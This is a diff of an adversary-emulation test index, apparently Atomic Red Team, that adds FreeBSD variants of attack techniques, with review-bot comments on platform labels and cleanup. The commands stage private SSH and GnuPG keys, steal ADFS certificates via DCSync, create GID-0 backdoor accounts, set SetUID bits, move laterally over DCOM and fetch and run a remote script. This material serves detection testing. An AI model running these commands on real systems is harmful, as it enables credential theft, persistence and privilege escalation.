@@ -335163,8 +336211,11 @@ "dir c:\\ /b /s .key | findstr /e .key\n", "find / -name id_rsa 2>/dev/null >> /tmp/keyfile_locations.txt\nexit 0\n", "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec cp --parents {} /tmp/art-staging \\;\nexit 0\n", + "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec gcp --parents {} /tmp/art-staging \\;\n", "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec rsync -R {} /tmp/art-staging \\;\nexit 0\n", + "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec rsync -R {} /tmp/art-staging \\;\n", "mkdir /tmp/GnuPG\nfind / -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} /tmp/GnuPG \\;\nexit 0\n", + "mkdir /tmp/GnuPG\nfind / -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} /tmp/GnuPG \\;\n", "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"adfs_svc\"\n$PWord = ConvertTo-SecureString -String \"ReallyStrongPassword\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList Administrator, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server sts.contoso.com\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = 
$Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \ncertutil.exe -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx\n", @@ -335202,10 +336253,10 @@ { "name": "Discover Private SSH Keys", "auto_generated_guid": "46959285-906d-40fa-9437-5a439accd878", - "description": "Discover private SSH keys on a macOS or Linux system.\n", + "description": "Discover private SSH keys on a FreeBSD, macOS or Linux system.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "search_path": { 
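Review bot: The three new FreeBSD command_list entries (gcp, rsync, rsync -Rr) drop the trailing `exit 0` that their Linux originals end with; that `exit 0` masks find's non-zero status when it meets an unreadable directory (stderr is discarded but the status is not), so a non-root run of the FreeBSD tests will be reported as failed even though keys were staged. Restore `exit 0` as the last line, or state in the test descriptions that root is required. In the second hunk, the "Discover Private SSH Keys" description now names FreeBSD while `supported_platforms` remains linux and macos, so the text promises a platform the metadata does not declare.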
@@ -335250,6 +336301,39 @@ "name": "sh" } }, + { + "name": "Copy Private SSH Keys with CP (freebsd)", + "auto_generated_guid": "12e4a260-a7fd-4ed8-bf18-1a28c1395775", + "description": "Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "path", + "default": "/tmp/art-staging" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Install GNU cp from coreutils package.\n", + "prereq_command": "if [ ! -x \"$(command -v gcp)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y coreutils)\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, { "name": "Copy Private SSH Keys with rsync", "auto_generated_guid": "864bb0b2-6bb5-489a-b43b-a77b3a16d68a", 
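Review bot: `mkdir #{output_folder}` in the new "Copy Private SSH Keys with CP (freebsd)" executor is not `mkdir -p`, so a second run (or a run after the rsync sibling, which shares the `/tmp/art-staging` default) starts with an error, and because the command has no `exit 0` the pass/fail result is whatever `find` returns, which is non-zero as soon as one directory is unreadable. Suggest `mkdir -p #{output_folder}` plus `exit 0`, or a description sentence saying root is required. `pkg install -y coreutils` in `get_prereq_command` needs root, yet no `elevation_required` is declared for the dependency executor or the test. `"supported_platforms": ["linux"]` is wrong for a test whose prerequisite is FreeBSD's pkg and whose name says freebsd.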
@@ -335276,6 +336360,39 @@ "name": "sh" } }, + { + "name": "Copy Private SSH Keys with rsync (freebsd)", + "auto_generated_guid": "922b1080-0b95-42b0-9585-b9a5ea0af044", + "description": "Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "path", + "default": "/tmp/art-staging" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if rsync is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v rsync)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y rsync)\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, { "name": "Copy the users GnuPG directory with rsync", "auto_generated_guid": "2a5a0601-f5fb-4e2e-aa09-73282ae6afca", 
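Review bot: "Copy Private SSH Keys with rsync (freebsd)" is the Linux rsync test verbatim minus the trailing `exit 0` and plus a `pkg install -y rsync` prerequisite, so the duplicate adds no command coverage while doubling maintenance; consider adding freebsd to the existing test's platform list and attaching the pkg dependency there, unless the schema cannot express a per-platform dependency. If the separate test stays, its `supported_platforms` must name freebsd rather than linux, and `mkdir` should be `mkdir -p` so a pre-existing `/tmp/art-staging` does not fail the first line. Cleanup is `rm -rf #{output_folder}` on an operator-supplied path; the Linux sibling does the same, but one description sentence noting that the folder is removed recursively would not hurt.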
@@ -335302,6 +336419,39 @@ "name": "sh" } }, + { + "name": "Copy the users GnuPG directory with rsync (freebsd)", + "auto_generated_guid": "b05ac39b-515f-48e9-88e9-2f141b5bcad0", + "description": "Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from", + "type": "path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing a copy of the .gnupg directory", + "type": "path", + "default": "/tmp/GnuPG" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if rsync is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v rsync)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y rsync)\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, { "name": "ADFS token signing and encryption certificates theft - Local", "auto_generated_guid": "78e95057-d429-4e66-8f82-0f060c1ac96f", @@ -344661,6 +345811,8 @@ ], "command_list": [ "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" EXIT'\n", + "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" EXIT'\n", + "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" SIGINT && kill -SIGINT $$'\n", "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" SIGINT && kill -SIGINT $$'\n" ], "commands": [], 
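Review bot: The FreeBSD GnuPG test copies every `.gnupg` directory under `#{search_path}` with `rsync -Rr`, which includes `private-keys-v1.d` and any keyrings, but like its siblings it lost the `exit 0` that keeps an unreadable directory from failing the test, and its `supported_platforms` says linux for a FreeBSD-only pkg dependency; add `exit 0` (or document root as required) and fix the platform. The second hunk shows a side effect of the trap duplication: `command_list` now holds each bash trap string twice, byte-identical, which is a sign the freebsd trap tests differ from the originals only in metadata. If the generator emits one entry per test, either give the freebsd tests a distinguishing command or merge them into the originals with an extended platform list.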
@@ -344687,6 +345839,27 @@ "name": "sh" } }, + { + "name": "Trap EXIT (freebsd)", + "auto_generated_guid": "be1a5d70-6865-44aa-ab50-42244c9fd16f", + "description": "Launch bash shell with command arg to create TRAP on EXIT.\nThe trap executes script that writes to /tmp/art-fish.txt\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if bash is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v bash)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y bash)\n" + } + ], + "executor": { + "command": "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" EXIT'\n", + "cleanup_command": "rm -f /tmp/art-fish.txt\n", + "name": "sh" + } + }, { "name": "Trap SIGINT", "auto_generated_guid": "a547d1ba-1d7a-4cc5-a9cb-8d65e8809636", @@ -344700,6 +345873,27 @@ "cleanup_command": "rm -f /tmp/art-fish.txt\n", "name": "sh" } + }, + { + "name": "Trap SIGINT (freebsd)", + "auto_generated_guid": "ade10242-1eac-43df-8412-be0d4c704ada", + "description": "Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.\nThe trap executes script that writes to /tmp/art-fish.txt\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if bash is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v bash)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y bash)\n" + } + ], + "executor": { + "command": "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" SIGINT && kill -SIGINT $$'\n", + "cleanup_command": "rm -f /tmp/art-fish.txt\n", + "name": "sh" + } } ] } 
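Review bot: "Trap EXIT (freebsd)" and "Trap SIGINT (freebsd)" carry the same `command` and `cleanup_command` as the existing Linux tests and are labeled `"supported_platforms": ["linux"]`, so as written they are indistinguishable from the originals except for the `pkg install -y bash` dependency; either mark them `"supported_platforms": ["freebsd"]` or fold the pkg dependency into the existing tests. The `get_prereq_command` installs a package and therefore needs root, but no `elevation_required` is set on the dependency executor or the test. The description should also say that bash is not part of the FreeBSD base system, which is why the dependency exists.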
@@ -345861,10 +347055,12 @@ ], "command_list": [ "useradd -M -N -r -s /bin/bash -c evil_account evil_user\n", + "pw useradd evil_user -s /usr/sbin/nologin -d /nonexistent -c evil_account\n", "dscl . -create /Users/evil_user\ndscl . -create /Users/evil_user UserShell /bin/zsh\ndscl . -create /Users/evil_user RealName \"Evil Account\"\ndscl . -create /Users/evil_user UniqueID \"1010\"\ndscl . -create /Users/evil_user PrimaryGroupID 80\ndscl . -create /Users/evil_user NFSHomeDirectory /Users/evil_user\n", "net user /add \"T1136.001_CMD\" \"T1136.001_CMD!\"\n", "New-LocalUser -Name \"T1136.001_PowerShell\" -NoPassword\n", "useradd -g 0 -M -d /root -s /bin/bash butter\nif [ $(cat /etc/os-release | grep -i 'Name=\"ubuntu\"') ]; then echo \"butter:BetterWithButter\" | sudo chpasswd; else echo \"BetterWithButter\" | passwd --stdin butter; fi;\n", + "pw useradd butter -g 0 -d /root -s /bin/sh\necho \"BetterWithButter\" | pw usermod butter -h 0\n", "net user /add \"T1136.001_Admin\" \"T1136_pass\"\nnet localgroup administrators \"T1136.001_Admin\" /add\n" ], "commands": [], @@ -345898,6 +347094,27 @@ "elevation_required": true } }, + { + "name": "Create a user account on a FreeBSD system", + "auto_generated_guid": "a39ee1bc-b8c1-4331-8e5f-1859eb408518", + "description": "Create a user via pw\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "username": { + "description": "Username of the user to create", + "type": "string", + "default": "evil_user" + } + }, + "executor": { + "command": "pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account\n", + "cleanup_command": "rmuser -y #{username}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Create a user account on a MacOS system", "auto_generated_guid": "01993ba5-1da3-4e15-a719-b690d4f0f0b2", 
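Review bot: `pw` is FreeBSD's account tool and does not exist on Linux, yet "Create a user account on a FreeBSD system" declares `"supported_platforms": ["linux"]`, so the test will be scheduled on hosts where the command cannot run; use `"supported_platforms": ["freebsd"]`. The cleanup `rmuser -y #{username}` also removes the account's home directory and mail spool, which is harmless with the default `-d /nonexistent`, but a description sentence should say so because `username` is operator-supplied. The second command_list entry commits the literal password `BetterWithButter` fed to `pw usermod -h 0`; that mirrors the Linux test, but the description should state that the result is a real GID-0 login that must be removed by cleanup.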
@@ -345997,6 +347214,32 @@ "elevation_required": true } }, + { + "name": "Create a new user in FreeBSD with `root` GID.", + "auto_generated_guid": "d141afeb-d2bc-4934-8dd5-b7dba0f9f67a", + "description": "Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "username": { + "description": "Username of the user to create", + "type": "string", + "default": "butter" + }, + "password": { + "description": "Password of the user to create", + "type": "string", + "default": "BetterWithButter" + } + }, + "executor": { + "command": "pw useradd #{username} -g 0 -d /root -s /bin/sh\necho \"#{password}\" | pw usermod #{username} -h 0\n", + "cleanup_command": "pw userdel #{username}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Create a new Windows admin user", "auto_generated_guid": "fda74566-a604-4581-a4cc-fbbe21d66559", @@ -358378,8 +359621,11 @@ ], "command_list": [ "cp /T1548.001/src/hello.c /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "cp /T1548.001/src/hello.c /tmp/hello.c\nchown root /tmp/hello.c\nmake /tmp/hello\nchown root /tmp/hello\nchmod u+s /tmp/hello\n/tmp/hello\n", "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod u+xs /tmp/evilBinary\n", + "touch /tmp/evilBinary\nchown root /tmp/evilBinary\nchmod u+xs /tmp/evilBinary\n", "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod g+xs /tmp/evilBinary\n", + "touch /tmp/evilBinary\nchown root /tmp/evilBinary\nchmod g+xs /tmp/evilBinary\n", "cp /T1548.001/src/cap.c /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", "touch /tmp/evilBinary\nsudo setcap cap_setuid=ep /tmp/evilBinary\n", "find /usr/bin -perm -4000\n", 
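Review bot: On FreeBSD the group with GID 0 is `wheel`, not `root` (check /etc/group on a stock install), so the new test's name "Create a new user in FreeBSD with `root` GID" and its description "adds the user to the `root` group" carry the Linux wording over and will mislead anyone mapping this to detection content; suggest `Creates a new user in FreeBSD with GID 0 (the wheel group) and root's home directory.`, to be confirmed on a FreeBSD host. The cleanup `pw userdel #{username}` deliberately omits `-r`, which is correct because the account's home is `/root`; a description note such as `cleanup must not use -r: the home directory is /root` will stop someone "fixing" it. `supported_platforms` is linux for a pw-based, FreeBSD-only test. In the T1548.001 command_list hunk the FreeBSD variants drop `sudo`, which is fine only because `elevation_required` is true on those tests.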
@@ -358417,10 +359663,31 @@ "elevation_required": true } }, + { + "name": "Make and modify binary from C source (freebsd)", + "auto_generated_guid": "dd580455-d84b-481b-b8b0-ac96f3b1dc4c", + "description": "Make, change owner, and change file attributes on a C source code file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "payload": { + "description": "hello.c payload", + "type": "path", + "default": "PathToAtomicsFolder/T1548.001/src/hello.c" + } + }, + "executor": { + "command": "cp #{payload} /tmp/hello.c\nchown root /tmp/hello.c\nmake /tmp/hello\nchown root /tmp/hello\nchmod u+s /tmp/hello\n/tmp/hello\n", + "cleanup_command": "rm /tmp/hello\nrm /tmp/hello.c\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Set a SetUID flag on file", "auto_generated_guid": "759055b3-3885-4582-a8ec-c00c9d64dd79", - "description": "This test sets the SetUID flag on a file in Linux and macOS.\n", + "description": "This test sets the SetUID flag on a file in FreeBSD.\n", "supported_platforms": [ "macos", "linux" @@ -358439,6 +359706,27 @@ "elevation_required": true } }, + { + "name": "Set a SetUID flag on file (freebsd)", + "auto_generated_guid": "9be9b827-ff47-4e1b-bef8-217db6fb7283", + "description": "This test sets the SetUID flag on a file in FreeBSD.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_setuid": { + "description": "Path of file to set SetUID flag", + "type": "path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "touch #{file_to_setuid}\nchown root #{file_to_setuid}\nchmod u+xs #{file_to_setuid}\n", + "cleanup_command": "rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Set a SetGID flag on file", "auto_generated_guid": "db55f666-7cba-46c6-9fe6-205a05c3242c", 
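Review bot: The description of the existing "Set a SetUID flag on file" test (GUID 759055b3) was changed from "in Linux and macOS" to "in FreeBSD" while its `supported_platforms` still lists macos and linux; since a separate "(freebsd)" variant with that exact description is added just below, this looks like an edit landed on the wrong test, so restore `"description": "This test sets the SetUID flag on a file in Linux and macOS.\n"`. In the new "Make and modify binary from C source (freebsd)" test, `make /tmp/hello` relies on make's implicit `.c` rule and compiles, chowns and SetUID-bits a file in world-writable `/tmp` as root; acceptable for an emulation, but the description should say that `/tmp/hello` is a root-owned SetUID binary until cleanup runs. Both new tests are labeled linux rather than freebsd.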
@@ -358461,6 +359749,27 @@ "elevation_required": true } }, + { + "name": "Set a SetGID flag on file (freebsd)", + "auto_generated_guid": "1f73af33-62a8-4bf1-bd10-3bea931f2c0d", + "description": "This test sets the SetGID flag on a file in FreeBSD.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_setuid": { + "description": "Path of file to set SetGID flag", + "type": "path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "touch #{file_to_setuid}\nchown root #{file_to_setuid}\nchmod g+xs #{file_to_setuid}\n", + "cleanup_command": "rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Make and modify capabilities of a binary", "auto_generated_guid": "db53959c-207d-4000-9e7a-cd8eb417e072", @@ -359782,7 +361091,8 @@ } ], "command_list": [ - "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n" + "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", + "copy c:\\windows\\system32\\calc.exe 'C:\\users\\admin\\AppData\\local\\Microsoft\\WindowsApps\\foxprow.exe'\n$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"Excel.Application\",\"localhost\"))\n$com.ActivateMicrosoftApp(\"5\")\n" ], "commands": [], "queries": [], 
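Review bot: The new "Set a SetGID flag on file (freebsd)" test names its input argument `file_to_setuid` while it sets the SetGID bit (`chmod g+xs`); the Linux SetGID sibling is outside this hunk so I cannot tell whether the name was copied from it, but `file_to_setgid` with the description `Path of file to set SetGID flag` reads correctly and only affects the test's own `#{...}` references. The test is labeled `"supported_platforms": ["linux"]` despite the freebsd suffix. In the T1021.003 command_list hunk, the new entry hard-codes `C:\users\admin\AppData\local\Microsoft\WindowsApps\foxprow.exe`, the generated default of the `user` argument, so the listed command only works on hosts that happen to have an `admin` profile.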
@@ -359812,6 +361122,38 @@ "command": "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"#{computer_name}\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", "name": "powershell" } + }, + { + "name": "PowerShell Lateral Movement Using Excel Application Object", + "auto_generated_guid": "505f24be-1c11-4694-b614-e01ae1cd2570", + "description": "Powershell lateral movement using the Excel COM objects.\n\nReference:\n\nhttps://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922\n\nUpon successful execution, cmd will spawn calc.exe on a remote computer.\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "Microsoft Excel must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"Excel.Application\" | Out-Null\n Stop-Process -Name \"Excel\"\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Excel manually to meet this requirement\"\n", + "cleanup_command": "Remove-Item 'C:\\users\\#{user}\\AppData\\local\\Microsoft\\WindowsApps\\foxprow.exe'\n" + } + ], + "input_arguments": { + "computer_name": { + "description": "Hostname or IP", + "type": "string", + "default": "localhost" + }, + "user": { + "description": "Name of user", + "type": "string", + "default": "admin" + } + }, + "executor": { + "command": "copy c:\\windows\\system32\\calc.exe 'C:\\users\\#{user}\\AppData\\local\\Microsoft\\WindowsApps\\foxprow.exe'\n$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"Excel.Application\",\"#{computer_name}\"))\n$com.ActivateMicrosoftApp(\"5\")\n", + "name": "powershell" + } } ] } 
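Review bot: The `cleanup_command` for "PowerShell Lateral Movement Using Excel Application Object" sits inside the `dependencies` entry instead of the `executor`, so the framework will not run it after the test and the copied `foxprow.exe` stays in `...\Microsoft\WindowsApps\`, a directory on the user's PATH; move `"cleanup_command": "Remove-Item 'C:\\users\\#{user}\\AppData\\local\\Microsoft\\WindowsApps\\foxprow.exe' -ErrorAction Ignore\n"` next to `"command"` in the executor. The prerequisite check runs `Stop-Process -Name "Excel"`, which kills every Excel instance on the host rather than the one it created; keep the COM object in a variable and call its `Quit()` method instead. The copy runs on the local machine while the COM server is created on `#{computer_name}`, so for anything other than `localhost` the payload is staged on the wrong host, and the description should say the test is local-only unless the file is placed on the target first. Defaulting `user` from `$env:USERNAME` (or using `$env:LOCALAPPDATA` in the path) would also drop the assumption that an `admin` profile exists.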
@@ -369973,11 +371315,11 @@ "auto_generated_guid": "342cc723-127c-4d3a-8292-9c0c6b4ecadc", "description": "Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo \"$ssh_authorized_keys\" > ~/.ssh/authorized_keys; fi;\n", "cleanup_command": "unset ssh_authorized_keys\n" 
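Review bot: Switching this executor from `bash` to `sh` changes what `echo "$ssh_authorized_keys"` does on systems where /bin/sh is dash: dash's builtin echo interprets backslash escapes, and `$(cat ...)` already strips trailing newlines, so an `authorized_keys` containing `\` sequences (for example inside a `command="..."` option) is written back differently from the original, and a test meant to prove "same contents" can alter the file that controls SSH login. Use `printf '%s\n' "$ssh_authorized_keys" > ~/.ssh/authorized_keys`, which behaves the same across sh implementations. The `cleanup_command` `unset ssh_authorized_keys` restores nothing; the description should state that the file is rewritten in place, and a `cp -p ~/.ssh/authorized_keys ~/.ssh/authorized_keys.bak` before the rewrite would give the operator a way back.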
@@ -373537,7 +374879,7 @@ "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", "netsh advfirewall firewall show rule name=all\n", - "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"netstat -Sp tcp\"; else cmd=\"netstat -ant\"; fi;\nif [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo \"netstat is missing from the machine. 
skipping...\"; fi;\n", "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", "$ports = Get-content \"\\T1016\\src\\top-128.txt\"\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=subnet)\n", @@ -373603,7 +374945,7 @@ { "name": "System Network Configuration Discovery", "auto_generated_guid": "c141bbdb-7fca-4254-9fd6-f47e79447e17", - "description": "Identify network configuration information.\n\nUpon successful execution, sh will spawn multiple commands and output will be via stdout.\n", + "description": "Identify network configuration information.\nUpon successful execution, sh will spawn multiple commands and output will be via stdout.\n", "supported_platforms": [ "macos", "linux" 
@@ -373617,7 +374959,7 @@ } ], "executor": { - "command": "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "command": "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"netstat -Sp tcp\"; else cmd=\"netstat -ant\"; fi;\nif [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", "name": "sh" } }, 
